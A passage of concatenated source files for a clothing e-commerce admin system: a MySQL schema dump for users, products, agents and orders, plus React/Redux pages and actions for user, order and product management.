message.error('登录有效期失效,请重新登录');
store.dispatch(authUserExpire());
}
} else {
message.error('Error', error);
}
}
}
<file_sep>/*
SQLyog Ultimate v11.22 (64 bit)
MySQL - 5.7.22 : Database - cloth_mall
*********************************************************************
*/
/*!40101 SET NAMES utf8 */;
/*!40101 SET SQL_MODE=''*/;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
CREATE DATABASE /*!32312 IF NOT EXISTS*/`cloth_mall` /*!40100 DEFAULT CHARACTER SET utf8mb4 */;
USE `cloth_mall`;
/*Table structure for table `t_user_admin` */
DROP TABLE IF EXISTS `t_user_admin`;
CREATE TABLE `t_user_admin` (
`id` int(11) NOT NULL AUTO_INCREMENT COMMENT '主键',
`username` varchar(45) NOT NULL COMMENT '用户名',
`password` varchar(128) NOT NULL COMMENT '密码,<PASSWORD>',
`type` int(11) NOT NULL DEFAULT '0' COMMENT '用户类型:0-内部用户',
`mobile` varchar(45) DEFAULT NULL COMMENT '手机号',
`email` varchar(45) DEFAULT NULL COMMENT '邮箱',
`url` varchar(120) DEFAULT NULL COMMENT '头像',
`status` tinyint(1) NOT NULL COMMENT '状态:0-不可用,1-可用',
`creator` varchar(64) DEFAULT NULL COMMENT '创建人',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`editer` varchar(64) DEFAULT NULL COMMENT '修改人',
`update_time` datetime DEFAULT NULL COMMENT '修改时间',
PRIMARY KEY (`id`),
UNIQUE KEY `username_key` (`username`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='管理员表';
/*Table structure for table `t_user_account` */
DROP TABLE IF EXISTS `t_user_account`;
CREATE TABLE `t_user_account` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`password` varchar(70) DEFAULT NULL COMMENT '密码,<PASSWORD>',
`phone_number` varchar(20) DEFAULT '' COMMENT '手机号码,登录时用手机号码+密码登录',
`name` varchar(20) DEFAULT NULL COMMENT '昵称',
`email` varchar(50) DEFAULT NULL COMMENT '邮箱',
`url` varchar(200) DEFAULT NULL COMMENT '头像',
`regist_channel` varchar(32) DEFAULT NULL COMMENT '用户来源:0-公众号,1-小程序,2-App,3-网站',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`update_time` datetime DEFAULT NULL COMMENT '更新时间',
`latest_login_time` datetime DEFAULT NULL COMMENT '最近登录时间',
`status` varchar(2) DEFAULT NULL COMMENT '状态:0正常 1封号',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='用户表';
/*Table structure for table `t_user_account_receive_address` */
DROP TABLE IF EXISTS `t_user_account_receive_address`;
CREATE TABLE `t_user_account_receive_address` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`account_id` bigint(32) DEFAULT NULL COMMENT '地址对应用户ID',
`consignee_name` varchar(20) COLLATE utf8mb4_bin DEFAULT NULL COMMENT '收货人姓名',
`phone_number` varchar(20) COLLATE utf8mb4_bin NOT NULL COMMENT '手机号码',
`province` bigint(32) DEFAULT NULL COMMENT '省',
`province_name` varchar(100) COLLATE utf8mb4_bin DEFAULT '' COMMENT '省份名称',
`city` bigint(32) DEFAULT NULL COMMENT '市',
`city_name` varchar(100) COLLATE utf8mb4_bin DEFAULT '' COMMENT '城市名称',
`district` bigint(32) NOT NULL COMMENT '县/区',
`district_name` varchar(100) COLLATE utf8mb4_bin DEFAULT '' COMMENT '县/区',
`address` varchar(50) COLLATE utf8mb4_bin DEFAULT NULL COMMENT '详细地址',
`full_address` varchar(500) COLLATE utf8mb4_bin DEFAULT NULL COMMENT '全地址',
`is_defult` varchar(5) COLLATE utf8mb4_bin DEFAULT NULL COMMENT '是否默认地址,0-默认地址,1-非默认地址',
`create_time` datetime NOT NULL COMMENT '创建时间',
`update_time` datetime NOT NULL COMMENT '修改时间',
`is_deleted` smallint(2) DEFAULT '0' COMMENT '标识是否删除:0-未删除,1-删除',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_bin COMMENT='用户收货地址表';
/*Table structure for table `t_dictionary` */
DROP TABLE IF EXISTS `t_dictionary`;
CREATE TABLE `t_dictionary` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`type` varchar(30) NOT NULL COMMENT '类型',
`code` varchar(50) NOT NULL COMMENT '字典编码',
`value` varchar(11) NOT NULL COMMENT '值',
`name` varchar(50) NOT NULL COMMENT '名称',
`parentcode` varchar(50) NOT NULL COMMENT '父编码',
`gradation` int(3) DEFAULT NULL COMMENT '顺序',
`level` int(3) DEFAULT NULL COMMENT '层级',
`remark` varchar(150) DEFAULT NULL COMMENT '备注',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`creator` varchar(64) DEFAULT NULL COMMENT '创建者',
`editer` varchar(64) DEFAULT NULL COMMENT '更新者',
`update_time` datetime DEFAULT NULL COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='数据字典表';
/*Table structure for table `t_account_log` */
DROP TABLE IF EXISTS `t_account_log`;
CREATE TABLE `t_account_log` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`account_id` bigint(20) unsigned DEFAULT NULL COMMENT '用户Id',
`event_type` varchar(20) DEFAULT NULL COMMENT '事件类型:0-登录,1-Logout',
`app` varchar(30) DEFAULT NULL COMMENT '应用',
`login_IP_Address` varchar(100) DEFAULT NULL COMMENT '登录IP地址',
`location` varchar(100) DEFAULT NULL COMMENT '事件发生位置',
`timestamp` datetime DEFAULT NULL COMMENT '时间戳',
`remark` varchar(500) DEFAULT NULL COMMENT '备注',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='用户日志';
/*Table structure for table `t_product` */
DROP TABLE IF EXISTS `t_product`;
CREATE TABLE `t_product` (
`id` bigint(32) NOT NULL COMMENT '产品编号',
`same_style_num` varchar(32) NOT NULL COMMENT '产品货号',/*用户自定义,最后两位同款颜色序号,其余为款式编号*/
‘product_inventory’ int comment '库存量',
`factory_num` varchar(32) DEFAULT NULL COMMENT '工厂代码',
`name` varchar(75) NOT NULL COMMENT '产品名称',
`main_picture` varchar(120) DEFAULT NULL COMMENT '主图',
`detail_picture` text COMMENT '详情图,最多不超过五张',
`detail` varchar(5000) DEFAULT NULL COMMENT '商品详情',
`colour` varchar(260) DEFAULT NULL COMMENT '商品颜色',
`product_category` varchar(50) DEFAULT NULL COMMENT '产品大类', /*有什么*/
`product_subcategory` varchar(50) DEFAULT NULL COMMENT '产品子类',/*有什么*/
`status` varchar(30) DEFAULT NULL COMMENT '产品状态:0-待上架,1-上架,2-下架',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`update_time` datetime DEFAULT NULL COMMENT '更新时间',
`creator` varchar(64) DEFAULT NULL COMMENT '创建者',
`editer` varchar(64) DEFAULT NULL COMMENT '编辑者',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='产品表';
/*Table structure for table `t_product_price` */
DROP TABLE IF EXISTS `t_product_price`;
CREATE TABLE `t_product_price` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`product_id` bigint(32) NOT NULL COMMENT '产品ID',
`interval` varchar(50) DEFAULT NULL COMMENT '区间',
`unit` varchar(20) DEFAULT NULL COMMENT '单位',
`price` float(10,2) DEFAULT NULL COMMENT '价格',
`original_price` float(10,2) DEFAULT NULL COMMENT '划线价',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`update_time` datetime DEFAULT NULL COMMENT '更新时间',
`creator` varchar(64) DEFAULT NULL COMMENT '创建者',
`editer` varchar(64) DEFAULT NULL COMMENT '更新者',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='产品价格表';
/*Table structure for table `t_oauth_client` */
/*Table structure for table `t_agent` */
DROP TABLE IF EXISTS `t_agent`;
CREATE TABLE `t_agent` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`account_id` bigint(32) NOT NULL COMMENT '用户ID',
`type` varchar(20) NOT NULL COMMENT '代理商类型,0-门店代理商,1-个人代理商',
`di_per` double DEFAULT NULL COMMENT '分成提点',
`name` varchar(30) DEFAULT NULL COMMENT '代理商名称',
`url` varchar(120) DEFAULT NULL COMMENT '代理商门店图片地址',
`detail` text COMMENT '门店详情',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`creator` varchar(64) DEFAULT NULL COMMENT '创建者',
`editer` varchar(64) DEFAULT NULL COMMENT '修改者',
`update_time` datetime DEFAULT NULL COMMENT '修改时间',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='代理商表';
/*Table structure for table `t_agent_product` */
DROP TABLE IF EXISTS `t_agent_product`;
CREATE TABLE `t_agent_product` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`agent_id` bigint(32) DEFAULT NULL COMMENT '代理商ID',
`product_id` bigint(32) DEFAULT NULL COMMENT '产品ID',
`sign` varchar(30) DEFAULT NULL COMMENT '加密后的码值',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`creator` varchar(64) DEFAULT NULL COMMENT '创建者',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='代理商产品关联表';
/*Table structure for table `t_shop_car` */
DROP TABLE IF EXISTS `t_shop_car`;
CREATE TABLE `t_shop_car` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`product_id` bigint(32) NOT NULL COMMENT '产品ID',
`account_id` bigint(32) NOT NULL COMMENT '用户ID',
`amount` float DEFAULT NULL COMMENT '数量',
`unit` varchar(20) DEFAULT NULL COMMENT '单位',
`agent_id` bigint(32) DEFAULT NULL COMMENT '代理商ID',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='购物车';
/*Table structure for table `t_oauth_client` */
DROP TABLE IF EXISTS `t_oauth_client`;
CREATE TABLE `t_oauth_client` (
`client_id` varchar(128) NOT NULL,
`secret` varchar(128) DEFAULT NULL,
`created_time` datetime DEFAULT NULL,
`modified_time` datetime DEFAULT NULL,
`grant_types` varchar(125) DEFAULT NULL,
`refresh_token_validity_seconds` int(11) DEFAULT NULL,
PRIMARY KEY (`client_id`),
UNIQUE KEY `client_id_UNIQUE` (`client_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*Table structure for table `t_oauth_refresh_token` */
DROP TABLE IF EXISTS `t_oauth_refresh_token`;
CREATE TABLE `t_oauth_refresh_token` (
`id` bigint(20) NOT NULL AUTO_INCREMENT,
`created_time` datetime DEFAULT NULL,
`modified_time` datetime DEFAULT NULL,
`account_id` bigint(20) unsigned DEFAULT NULL,
`client_id` varchar(45) DEFAULT NULL,
`refresh_token` varchar(45) DEFAULT NULL,
`expires_in` datetime DEFAULT NULL,
`authentication` text,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*Table structure for table `t_order` */
DROP TABLE IF EXISTS `t_order`;
CREATE TABLE `t_order` (
`id` varchar(32) NOT NULL COMMENT '主键',
`account_id` bigint(32) DEFAULT NULL COMMENT '用户ID',
`type` varchar(64) DEFAULT 'Normal' COMMENT '订单类型:Normal 正常',
`status` varchar(32) DEFAULT NULL COMMENT '订单状态:WaitForPay 0-待支付,WaitForDeliver 1-待发货,Shipped 2-已发货,Finished 3-已完成,Cancled 4-已取消',
`delivery_address` varchar(1024) DEFAULT NULL COMMENT '收货地址、 json 格式',
`express_company_name` varchar(75) DEFAULT NULL COMMENT '快递公司',
`express_tracking_no` varchar(64) DEFAULT NULL COMMENT '快递单号',
`payment_method` varchar(32) DEFAULT NULL COMMENT '支付方式:0-在线支付, 1-货到付款,2-公司转账',
`payment_channel` varchar(32) DEFAULT NULL COMMENT '支付渠道:0-微信Wechat, 1-支付宝,Alipay,2-银联',
`payment_no` varchar(32) DEFAULT NULL COMMENT '订单支付单号:第三方支付流水号',
`payment_status` varchar(32) DEFAULT NULL COMMENT '支付状态:0-支付成功,1-支付失败',
`order_amount_payable` float(10,2) DEFAULT null COMMENT '订单应付金额',
`order_amount_payment` float(10,2) DEFAULT NULL COMMENT '订单实付金额',
`rebate_total` float(10,2) DEFAULT NULL COMMENT '返点金额',
`rebate_status` varchar(2) DEFAULT NULL COMMENT '是否返点,0-是,1-否',
`agent_id` bigint(32) DEFAULT NULL COMMENT '代理商ID',
`note` varchar(512) DEFAULT NULL COMMENT '买家留言',
`pay_time` datetime DEFAULT NULL COMMENT '支付时间',
`delivery_method` varchar(32) DEFAULT NULL COMMENT '配送方式:0-快递配送, 1-上门自提',
`shipping_time` datetime DEFAULT NULL COMMENT '发货时间',
`received_time` datetime DEFAULT NULL COMMENT '收货时间',
`created_time` datetime DEFAULT NULL COMMENT '创建时间',
`update_time` datetime DEFAULT NULL COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='订单主表';
/*Table structure for table `t_order_product` */
DROP TABLE IF EXISTS `t_order_product`;
CREATE TABLE `t_order_product` (
`id` bigint(32) NOT NULL AUTO_INCREMENT,
`order_id` bigint(32) DEFAULT NULL COMMENT '订单ID',
`product_id` bigint(32) DEFAULT NULL COMMENT '产品ID',
`quantity` float(10,3) DEFAULT NULL COMMENT '数量',
`unit` varchar(20) DEFAULT NULL COMMENT '单位',
`price` double(10,2) DEFAULT NULL COMMENT '价格',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='订单产品关联表';
/*Table structure for table `t_sky_light` */
DROP TABLE IF EXISTS `t_sky_light`;
CREATE TABLE `t_sky_light` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT '主键',
`sky_id` varchar(50) NOT NULL COMMENT '天窗ID',
`sky_type` varchar(15) NOT NULL COMMENT '天窗类型:Banner',
`sky_content` text COMMENT '天窗内容',
`sky_title` varchar(25) DEFAULT NULL COMMENT '天窗标题',
`description` varchar(120) DEFAULT NULL COMMENT '描述',
`creator` varchar(64) DEFAULT NULL COMMENT '创建者',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`update_time` datetime DEFAULT NULL COMMENT '更新时间',
`editer` varchar(64) DEFAULT NULL COMMENT '更新者',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='天窗(轮播图)';
/*Table structure for table `t_topic` */
DROP TABLE IF EXISTS `t_topic`;
CREATE TABLE `t_topic` (
`id` bigint(32) NOT NULL AUTO_INCREMENT COMMENT 'ID',
`title` varchar(120) DEFAULT NULL COMMENT '标题',
`description` varchar(300) DEFAULT NULL COMMENT '描述',
`sort` bigint(20) DEFAULT '0' COMMENT '顺序',
`start_time` datetime DEFAULT NULL COMMENT '开始时间',
`end_time` datetime DEFAULT NULL COMMENT '结束时间',
`status` varchar(10) DEFAULT NULL COMMENT '状态',
`create_time` datetime DEFAULT NULL COMMENT '创建时间',
`update_time` datetime DEFAULT NULL COMMENT '更新时间',
`creator` varchar(64) DEFAULT NULL COMMENT '创建者',
`editer` varchar(64) DEFAULT NULL COMMENT '更新者',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='主题表';
/*Table structure for table `t_topic_product` */
DROP TABLE IF EXISTS `t_topic_product`;
CREATE TABLE `t_topic_product` (
`id` bigint(20) NOT NULL AUTO_INCREMENT COMMENT 'ID',
`topic_id` bigint(20) DEFAULT NULL COMMENT 'topicID',
`product_id` bigint(20) DEFAULT NULL COMMENT '产品ID',
`sort` bigint(20) DEFAULT NULL COMMENT '产品顺序',
`status` varchar(10) DEFAULT NULL COMMENT '状态',
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COMMENT='主题产品关联表';
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Card, Table, message } from 'antd';
import { formatDateSecond } from '../../utils/utils';
import EnhanceTitle from '../../component/EnhanceTitle';
import addressColumns from './columns/address';
import orderColumns from './columns/order';
import { getUserById, getUserAddressById, getUserOrderById } from '../../action/user';
import { deleteOrderById } from '../../action/order';
import './index.css';
@connect(({ user }) => ({
userDetail: user.userDetail,
userAddress: user.userAddress,
userOrderList: user.userOrderList
}), {
getUserById,
getUserAddressById,
getUserOrderById,
})
export default class OrderDetail extends React.PureComponent {
constructor(props) {
super(props);
this.orderColumns = [
...orderColumns,
{
title: '操作',
dataIndex: 'operate',
key: 'operate',
align: 'center',
render: (text, record) => <a onClick={() => this.deleteUserOrderById(record.id)} href="javascript:;">删除</a>
},
];
}
componentDidMount() {
const { match: { params } } = this.props;
this.props.getUserById(params.id);
this.props.getUserAddressById(params.id);
this.props.getUserOrderById({ accountId: params.id });
}
deleteUserOrderById = async (id) => {
const result = await deleteOrderById(id);
if (result && result.code === 0) {
message.success(`删除${id}订单成功`);
const { match: { params } } = this.props;
this.props.getUserOrderById({ accountId: params.id });
}
}
render() {
const { userDetail = {}, userAddress = {}, userOrderList = {} } = this.props;
const userAddressArr = [{ ...userAddress, name: userDetail.name, tag: 'address' }];
return (
<div className="page-detail">
<Card bordered={false}>
<EnhanceTitle title="用户详情" />
<div className="userinfo-box">
<div className="userinfo-left">
<img alt="用户头像" src={userDetail.url} />
<p>{userDetail.phoneNumber}</p>
</div>
<div className="userinfo-right">
<div className="userinfo-right1">
<p><span>用户ID</span><span>{userDetail.id}</span></p>
<p><span>姓名</span><span>{userDetail.name}</span></p>
<p><span>性别</span><span>TODO</span></p>
</div>
<div className="userinfo-right2">
<p><span>手机号</span><span>{userDetail.phoneNumber}</span></p>
<p><span>用户来源</span><span>{userDetail.registChannel}</span></p>
<p><span>注册时间</span><span>{formatDateSecond(userDetail.createTime)}</span></p>
</div>
</div>
</div>
</Card>
<Card bordered={false}>
<EnhanceTitle title="收货地址" />
<Table rowKey="tag" bordered columns={addressColumns} dataSource={userAddressArr} pagination={false} />
</Card>
<Card bordered={false}>
<EnhanceTitle title="订单记录" />
<Table rowKey="id" bordered columns={this.orderColumns} dataSource={userOrderList.records} />
</Card>
</div>
)
}
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Form, Icon, Input, Button, message } from 'antd';
import { postResetAdminInfo } from '../../action/auth';
import './index.css';
const FormItem = Form.Item;
const formReset = {
labelCol: {
xs: { span: 24 },
sm: { span: 6 },
},
wrapperCol: {
xs: { span: 24 },
sm: { span: 16 },
},
};
@connect(({ auth }) => ({
userInfo: auth.userInfo,
}), {
postResetAdminInfo
})
@Form.create()
export default class NormalLoginForm extends React.Component {
handleSubmit = (e) => {
e.preventDefault();
const { history, form } = this.props;
form.validateFields(async (err, values) => {
if (!err) {
const { userInfo = {} } = this.props;
const { sysUser = {} } = userInfo;
const resp = await this.props.postResetAdminInfo({
...sysUser,
...values,
});
if (resp) {
message.success('重置密码成功,将跳转登录页面');
history.push('/login');
}
}
});
}
render() {
const { getFieldDecorator } = this.props.form;
const { userInfo = {} } = this.props;
const { sysUser = {} } = userInfo;
return (
<div className="reset-page">
<h4>重置密码</h4>
<Form onSubmit={this.handleSubmit} className="reset-form">
<FormItem {...formReset} label="用户名">
{getFieldDecorator('username', {
initialValue: sysUser.username,
rules: [{ required: true, message: '请输入用户名' }],
})(
<Input placeholder="请输入用户名" />
)}
</FormItem>
<FormItem {...formReset} label="手机号">
{getFieldDecorator('phone', {
initialValue: sysUser.phone,
rules: [{ required: true, message: '请输入手机号' }],
})(
<Input placeholder="请输入手机号" />
)}
</FormItem>
<FormItem {...formReset} label="旧密码">
{getFieldDecorator('password', {
rules: [{ required: true, message: '请输入旧密码' }],
})(
<Input type="password" placeholder="请输入旧密码" />
)}
</FormItem>
<FormItem {...formReset} label="新密码">
{getFieldDecorator('newpassword1', {
rules: [{ required: true, message: '请输入新密码' }],
})(
<Input type="password" placeholder="请输入新密码" />
)}
</FormItem>
<FormItem {...formReset} style={{ textAlign: 'center' }}>
<Button type="primary" htmlType="submit" className="page-form-button">重置密码</Button>
</FormItem>
</Form>
</div>
);
}
}
<file_sep>import API from '../utils/api';
import { get, put, post } from '../utils/request';
export const USER_LOGIN = 'USER_LOGIN';
export const GET_USER_LIST = 'GET_USER_LIST';
export const GET_USER_BYID = 'GET_USER_BYID';
export const GET_USER_ADDRESS_BYID = 'GET_USER_ADDRESS_BYID';
export const GET_USER_ORDER_BYID = 'GET_USER_ORDER_BYID';
export const GET_USER_LOGIN_LOGS = 'GET_USER_LOGIN_LOGS';
export function getUsertList(params) {
return async (dispatch) => {
const result = await get(API.userList, params);
if (result && result.status === 200) {
dispatch({
type: GET_USER_LIST,
data: result.data
})
}
}
}
export function getUserById(id) {
return async (dispatch) => {
const result = await get(`${API.getUserById}/${id}`);
if (result && result.status === 200) {
dispatch({
type: GET_USER_BYID,
data: result.data.data
})
}
}
}
export function getUserAddressById(id) {
return async (dispatch) => {
const result = await get(`${API.getUserAddressById}/${id}`);
if (result && result.status === 200) {
dispatch({
type: GET_USER_ADDRESS_BYID,
data: result.data.data
})
}
}
}
export function getUserOrderById(params) {
return async (dispath) => {
const result = await get(API.getUserOrderById, params);
if (result && result.status === 200) {
dispath({
type: GET_USER_ORDER_BYID,
data: result.data
})
}
}
}
export async function updateUser(params) {
const result = await put(API.updateUser, params);
if (result && result.status === 200) {
return result.data;
}
}
export async function upgradeUser(params) {
const result = await post(API.upgradeUser, params);
if (result && result.status === 200) {
return result.data;
}
}
export function getUserLoginList(params) {
return async (dispatch) => {
const result = await get(API.getUserLoginList, params);
if (result && result.status === 200) {
dispatch({
type: GET_USER_LOGIN_LOGS,
data: result.data
})
}
}
}
<file_sep>import React from 'react';
import { Row, Col } from 'antd';
import './index.css';
class Description extends React.PureComponent {
static defaultProps = {
term: ''
}
render() {
const { term, children, ...restProps } = this.props;
return (
<Col {...restProps}>
<p className="description-content">
<span>{term}:</span>
<strong>{children}</strong>
</p>
</Col>
)
}
}
class DescriptionList extends React.PureComponent {
static defaultProps = {
col: 2,
}
render() {
const { col, children } = this.props;
const span = col ? 24 / col : 12;
return (
<div className="description-list">
<Row>
{React.Children.map(children, child => React.cloneElement(child, { span }))}
</Row>
</div>
)
}
}
DescriptionList.Description = Description;
export default DescriptionList;
<file_sep>import moment from 'moment';
export function formatDate(date) {
return moment(date).format('YYYY-MM-DD');
}
export function formatDateMinute(date) {
return moment(date).format('YYYY-MM-DD HH:mm');
}
export function formatDateSecond(date) {
return moment(date).format('YYYY-MM-DD HH:mm:ss');
}
export function formatYuan(money = 0) {
const yuan = (money / 100).toFixed(2);
return yuan.replace(/(\d)(?=(\d{3})+(?!\d))/g, '$1,');
}
export function fixedNumber(num = 0) {
return Number(num.toFixed(0));
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import { Card, Steps, Icon, Table, Button, message, Popconfirm } from 'antd';
import { getOrderById, updateOrder } from '../../action/order';
import EnhanceTitle from '../../component/EnhanceTitle';
import DescriptionList from '../../component/DescriptionList';
import productColumns from './columns/product';
import operatorColumns from './columns/operator';
import { formatDateSecond } from '../../utils/utils';
import { ORDER_STATUS, PAYMENT_METHOD } from '../../utils/constant';
import { ORDER_TYPE, PAYMENT_CHANNEL } from '../../utils/constant';
import './index.css';
const { Step } = Steps;
const { Description } = DescriptionList;
@connect(({ order }) => ({
orderDetail: order.orderDetail
}), {
getOrderById
})
export default class OrderDetail extends React.PureComponent {
componentDidMount() {
const { match: { params } } = this.props;
const id = params.id;
this.props.getOrderById(id);
}
cancelOrder = async () => {
const { match: { params } } = this.props;
const id = params.id;
const { orderDetail = {} } = this.props;
const account = orderDetail.account ? orderDetail.account: {};
const result = await updateOrder({
id,
accountId: account.id,
status: 4,
});
if (result && result.code === 0) {
this.setState({
visible: false,
});
message.success('取消订单成功');
} else {
message.error('取消订单失败,请稍后重试');
}
}
render() {
const { orderDetail = {} } = this.props;
const { productList = [] } = orderDetail;
const account = orderDetail.account ? orderDetail.account: {};
const address = orderDetail.address ? orderDetail.address : {};
return (
<div className="page-detail">
<Card bordered={false}>
<EnhanceTitle title="订单状态流" />
<Steps current={Number(orderDetail.status) + 1}>
<Step title="提交订单" description={formatDateSecond(orderDetail.createdTime)}/>
<Step title="支付订单" description={ORDER_STATUS[orderDetail.status] || '未支付'} />
<Step title="平台发货" description="" />
<Step title="确认收货" description="" />
<Step title="完成订单" description="" />
</Steps>
</Card>
<div className="order-status">
<div style={{ color: '#f5222d' }}>
<Icon style={{ marginRight: 5 }} type="exclamation-circle" theme="outlined" />
当前订单状态:{ORDER_STATUS[orderDetail.status] || '未支付'}
</div>
{orderDetail.status !== '4' && (
<div>
<Popconfirm
placement="topRight"
title="你确定关闭此订单吗"
onConfirm={this.cancelOrder}
okText="确定"
cancelText="取消"
>
<Button style={{ marginRight: '20px' }} type="danger">关闭订单</Button>
</Popconfirm>
</div>
)}
</div>
<Card bordered={false}>
<EnhanceTitle title="基本信息" />
<DescriptionList>
<Description term="订单编号">{orderDetail.id}</Description>
<Description term="订单金额">{orderDetail.orderAmountPayable / 100}(元)</Description>
<Description term="用户账号">{account.phoneNumber}</Description>
<Description term="支付方式">{PAYMENT_METHOD[orderDetail.paymentMethod]}</Description>
<Description term="支付渠道">{PAYMENT_CHANNEL[orderDetail.paymentChannel]}</Description>
<Description term="订单类型">{ORDER_TYPE[orderDetail.type]}</Description>
</DescriptionList>
</Card>
<Card bordered={false}>
<EnhanceTitle title="收货人信息" />
<DescriptionList>
<Description term="收货人">{address.consigneeName}</Description>
<Description term="手机号码">{address.phoneNumber}</Description>
{/* <Description term="邮政编码">{consigneeName}</Description> */}
<Description term="收货地址">{address.fullAddress}</Description>
</DescriptionList>
</Card>
<Card bordered={false}>
<EnhanceTitle title="产品信息" />
<Table rowKey="id" bordered columns={productColumns} dataSource={productList} pagination={false} />
</Card>
<Card bordered={false}>
<EnhanceTitle title="操作人信息" />
<Table bordered columns={operatorColumns} dataSource={[orderDetail]} />
</Card>
</div>
)
}
}
<file_sep>import React from 'react';
import { connect } from 'react-redux';
import qs from 'qs';
import ReactToPrint from "react-to-print";
import { Card, Form, Row, Col, Input, Select, Table, Button, Divider, message, Popconfirm, Modal } from 'antd';
import { getProductCode, getProductList } from '../../action/product';
import { getProductTypes } from '../../action/productType';
import { deleteAgentProduct } from '../../action/agent';
import { getSystemDicts } from '../../action/system';
import { formatDateSecond, formatYuan } from '../../utils/utils';
import { formItemLayout, showTotal, nullString, PRODUCT_STATUS, UNIT_VALUES } from '../../utils/constant';
import ProductModal from './ProductModal';
import './index.css'
const FormItem = Form.Item;
const { Option } = Select;
@connect(({ product }) => ({
productList: product.productList,
}), {
getProductList,
})
@Form.create()
export default class AgentProduct extends React.PureComponent {
constructor(props) {
super(props);
this.columns = [
{
title: '产品名称',
dataIndex: 'name',
key: 'name',
align: 'center',
fixed: 'left',
},
{
title: '产品货号',
dataIndex: 'sameStyleNum',
key: 'sameStyleNum',
align: 'center',
},
{
title: '产品大类',
dataIndex: 'productCategory',
key: 'productCategory',
align: 'center',
render: (text) => {
const { productCategory = [] } = this.state;
const info = productCategory.find(item => item.label === text) || {};
return info.description || nullString;
}
},
{
title: '产品子类',
dataIndex: 'productSubcategory',
key: 'productSubcategory',
align: 'center',
render: (text) => {
const info = this.state.dictLevel4.find(item => item.label === text) || {};
return info.description || nullString;
}
},
{
title: '产品图片',
dataIndex: 'mainPicture',
key: 'mainPicture',
align: 'center',
render: (text) => <img style={{ display: 'block' }} width="50" height="50" src={text} alt="产品图片" />
},
{
title: '价格(元)',
dataIndex: 'productPrice',
key: 'productPrice',
align: 'center',
render: (text, record) => {
const product = record.priceList && record.priceList.length ? record.priceList[0] : {}
return product.price !== undefined ? formatYuan(product['price']) : nullString
}
},
{
title: '计价单位',
dataIndex: 'unit',
key: 'unit',
align: 'center',
render: (text, record) => {
const product = record.priceList && record.priceList.length ? record.priceList[0] : {}
return UNIT_VALUES[product['unit']] || nullString
}
},
{
title: '颜色',
dataIndex: 'colour',
key: 'colour',
align: 'center',
},
{
title: '创建时间',
dataIndex: 'createTime',
key: 'createTime',
align: 'center',
width: '10%',
render: (text) => text ? formatDateSecond(text) : nullString
},
{
title: '状态',
dataIndex: 'status',
key: 'status',
align: 'center',
render: (text) => text ? PRODUCT_STATUS[text] : '待上架'
},
{
title: '操作',
dataIndex: 'operate',
key: 'operate',
align: 'center',
render: (text, record) => {
return (
<div>
<Popconfirm
placement="topLeft"
title={`请确定是否取消关联该产品?`}
onConfirm={() => this.agentProductSingle(record)}
okText="确定"
cancelText="取消"
>
<a href="javascript:;">取消</a>
</Popconfirm>
<Divider type="vertical" />
